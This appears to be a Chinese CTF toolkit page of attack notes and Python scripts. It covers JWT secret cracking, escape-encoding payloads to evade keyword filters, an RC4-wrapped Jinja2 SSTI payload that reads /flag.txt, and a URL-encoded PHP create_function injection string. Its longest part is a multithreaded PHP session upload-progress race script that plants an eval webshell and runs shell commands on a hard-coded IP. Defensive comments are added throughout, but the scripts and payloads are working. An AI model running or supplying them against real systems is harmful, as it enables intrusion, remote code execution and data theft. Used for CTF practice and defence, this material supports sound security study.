工具
在线工具
离线工具
其他
jwt爆破工具c-jwt-cracker
下载后,先安装libssl-dev
apt install libssl-dev
然后在c-jwt-cracker目录下执行make编译,最后直接运行,参数是待爆破的JWT(只有HMAC签名密钥较短、较弱时才能爆破出来,所以服务端应使用足够长的随机密钥):
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYSJ9.Xjc37g2j_pU5SFHYwoPSHWJDEmRVPtfHkbFfGPcn4W0
字符串转十六进制、八进制、Unicode脚本
# -*- coding:utf-8 -*-
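def hex_payload(payload):
    r"""Print *payload* rewritten as a run of ``\xNN`` escapes, one per character.

    Each character's code point is written as lowercase hex, zero-padded to
    two digits. Without the padding, code points below 0x10 came out with a
    single digit (``\xa``), which is not a valid escape in languages that
    require exactly two hex digits.

    NOTE(review): code points above 0xff still produce more than two digits,
    which is not a single-byte escape; callers with non-Latin-1 text should
    confirm what the consumer expects.

    Defensive relevance: keyword filters that compare raw strings will not
    match text written this way, so filters should decode escapes before
    matching.

    Args:
        payload: text to convert.

    Returns:
        None. The result is written to stdout.
    """
    res_payload = "".join("\\x{:02x}".format(ord(ch)) for ch in payload)
    print("[+]'{}' Convert to hex: \"{}\"".format(payload, res_payload))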
def oct_payload(payload):
    r"""Print *payload* rewritten as backslash-octal escapes, one per character.

    Every character becomes a backslash followed by the octal digits of its
    code point, with no padding (``p`` -> ``\160``).

    Defensive relevance: as with hex escapes, a filter that matches on the
    literal keyword will miss this form unless it decodes escapes first.

    Args:
        payload: text to convert.

    Returns:
        None. The result is written to stdout.
    """
    pieces = []
    for ch in payload:
        pieces.append("\\" + format(ord(ch), "o"))
    converted = "".join(pieces)
    print("[+]'{}' Convert to oct: \"{}\"".format(payload, converted))
def uni_payload(payload):
    r"""Print *payload* rewritten as ``\u{...}`` code-point escapes.

    Every character becomes ``\u{`` + lowercase hex of its code point + ``}``,
    with no padding (``p`` -> ``\u{70}``).

    Defensive relevance: input filters should normalise this escape form
    before comparing against keyword lists.

    Args:
        payload: text to convert.

    Returns:
        None. The result is written to stdout.
    """
    converted = "".join("\\u{" + format(ord(ch), "x") + "}" for ch in payload)
    print("[+]'{}' Convert to unicode: \"{}\"".format(payload, converted))
if __name__ == '__main__':
    # Demo run: print the same sample string in each of the three escape forms.
    payload = 'phpinfo'
    for convert in (hex_payload, oct_payload, uni_payload):
        convert(payload)
rc4编码rc4_main(密钥,原文)
import base64
from urllib.parse import quote
def rc4_main(key="init_key", message="init_message"):
    """Encrypt *message* with RC4 under *key* and return the result as text.

    Builds a fresh S-box from the key, runs the keystream over the message
    and returns what ``rc4_excrypt`` returns (a base64 string), passed
    through ``str``.

    NOTE(review): RC4 has known keystream biases and provides no integrity
    protection; this helper reproduces an existing scheme and should not be
    used to protect new data.

    Args:
        key: key string; each character contributes its code point.
        message: text to encrypt.

    Returns:
        The base64 text produced by ``rc4_excrypt``.
    """
    return str(rc4_excrypt(message, rc4_init_sbox(key)))
def rc4_init_sbox(key):
    """Run the RC4 key schedule and return the resulting 256-entry S-box.

    Starts from the identity permutation 0..255 and, for each position,
    swaps it with an index derived from the running sum of S-box values and
    key character code points (the key repeats cyclically).

    Args:
        key: non-empty key string. An empty key fails on the modulo by
            ``len(key)``.

    Returns:
        A new list holding a permutation of 0..255.
    """
    state = list(range(256))
    key_len = len(key)
    swap_idx = 0
    for pos in range(256):
        swap_idx = (swap_idx + state[pos] + ord(key[pos % key_len])) % 256
        state[pos], state[swap_idx] = state[swap_idx], state[pos]
    return state
def rc4_excrypt(plain, box):
    """XOR *plain* with the RC4 keystream generated from *box*.

    The keystream byte is XORed with each character's code point and the
    result is turned back into a character, so the cipher text is a str.
    The URL-quoted cipher text is printed, and the UTF-8 encoding of the
    cipher text is returned as base64.

    Args:
        plain: text to encrypt, processed one character at a time.
        box: 256-entry S-box; it is modified in place while the keystream
            is generated, so it cannot be reused for a second message.

    Returns:
        Base64 text of the UTF-8 encoded cipher string.
    """
    out_chars = []
    x = 0
    y = 0
    for ch in plain:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        keystream = box[(box[x] + box[y]) % 256]
        out_chars.append(chr(ord(ch) ^ keystream))
    cipher = "".join(out_chars)
    print("加密后的字符串是:%s" % quote(cipher))
    encoded = base64.b64encode(cipher.encode('utf-8'))
    return encoded.decode('utf-8')
# Example call from the write-up: encrypts a template expression under the key "HereIsTreasure".
# NOTE(review): the second argument looks like a Jinja2-style expression that walks Python
# object internals to read a file; it only has an effect on a server that decrypts request
# data and then renders it as template source. Defensive takeaway: never hand decrypted or
# otherwise user-derived text to a template engine as the template itself.
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")
url编码
import urllib.parse
import binascii
# Sample query string from the write-up; printed once unchanged for reference.
test = "debu=aqua_is_cute&file=data:,debu_debu_aqua&shana[]=1&passwd[]=2&flag[code]=create_function&flag[arg]=}var_dump(get_defined_vars());//"
print(test)

# Hex-encode the UTF-8 bytes, then cut the hex text into two-digit pairs so
# that every byte can be written as %XX.
test = test.encode('utf-8').hex()
alist = [test[pos:pos + 2] for pos in range(0, len(test), 2)]

# Percent-encode every byte, then restore '=' and '&' so the parameter
# structure stays intact. Detection note: a filter that inspects the raw
# query string will not see the original parameter names or values in this
# form; URL-decode before matching.
encoded = '%' + '%'.join(alist)
print(encoded.replace("%3d", "=").replace("%26", "&"))
文字取反获取字母字典
_码[1]
a果[1]
b来[1]
c在[1]
d国[1]
e的[1]
f白[1]
g是[1]
h时[1]
i於[1]
j数[1]
k用[1]
l铁[1]
m和[1]
n著[1]
o同[1]
p可[1]
q现[1]
r十[1]
s化
t拉
u花
v特
w利
x出
y军
z光
A得
B作
C会
D他
E了
F年
G一
H工
I消
J走
K质
L法
M没
N求
O水
P对
Q定
R子
S次
T高
U验
V究
W言
X种
Y要
Z好
session竞争脚本
import io
import requests
import threading # 多线程
from cffi.backend_ctypes import xrange
# Session id sent as the PHPSESSID cookie and used to build the /tmp/sess_<id> path in read().
sessid = '0'
# Hard-coded address from the original write-up; presumably a CTF challenge instance.
target = 'http://1.14.71.254:28231'
# Upload filename; read() looks for this string in the response body.
file = 'ph0ebus.txt'
# 50 KiB in-memory upload body shared by all threads.
f = io.BytesIO(b'a' * 1024 * 50)
def write(session):
    """Post the multipart upload to ``target`` in an endless loop.

    Each request carries a ``PHP_SESSION_UPLOAD_PROGRESS`` form field holding
    PHP code, the shared upload body ``f`` under the name ``file``, and a
    fixed ``PHPSESSID`` cookie.

    Defensive context: ``PHP_SESSION_UPLOAD_PROGRESS`` is the default name of
    PHP's upload-progress field, and its value is written into the session
    file while an upload is in flight. Setting
    ``session.upload_progress.enabled = Off`` removes that write; the
    underlying fix is to never include a request-controlled path.

    Args:
        session: a ``requests`` session shared between threads.

    Returns:
        Never returns; the loop has no exit condition.
    """
    form = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET["cmd"]);?>'}
    cookie_jar = {'PHPSESSID': sessid}
    while True:
        session.post(
            target,
            data=form,
            files={'file': (file, f)},
            cookies=cookie_jar,
        )
def read(session):
    """Request the session file path in an endless loop and report hits.

    Posts to ``target`` with ``file`` pointing at ``/tmp/sess_<sessid>``.
    When the upload filename appears in the response body, the body is
    printed and the module-level ``event`` is cleared; otherwise a retry
    marker is printed.

    Detection note: repeated requests whose parameters reference
    ``/tmp/sess_*`` (or the configured session save path) are a strong
    indicator of this race and are worth alerting on.

    Args:
        session: a ``requests`` session shared between threads.

    Returns:
        Never returns; clearing ``event`` does not stop the loop.
    """
    url = f"{target}?mode=foo&file=/tmp/sess_{sessid}&cmd=system('cd /;ls;cat nssctfasdasdflag');"
    while True:
        resp = session.post(url)
        if file not in resp.text:
            print("[+]retry")
            continue
        print(resp.text)
        event.clear()
if __name__ == "__main__":
    # Shared flag: set below and cleared in read().
    # NOTE(review): no visible code waits on or tests this Event, so the
    # worker loops have no stop condition and the process must be killed.
    event = threading.Event()
    with requests.session() as session:
        # xrange(1, 30) yields 29 values, so 29 uploader threads are started.
        # NOTE(review): xrange comes from an incidental cffi import; on
        # Python 3 the built-in range looks equivalent here - confirm.
        for i in xrange(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        # ...followed by 29 reader threads sharing the same session.
        for i in xrange(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    # NOTE(review): indentation was lost in this listing; placing this call
    # after the with-block is an assumption.
    event.set()
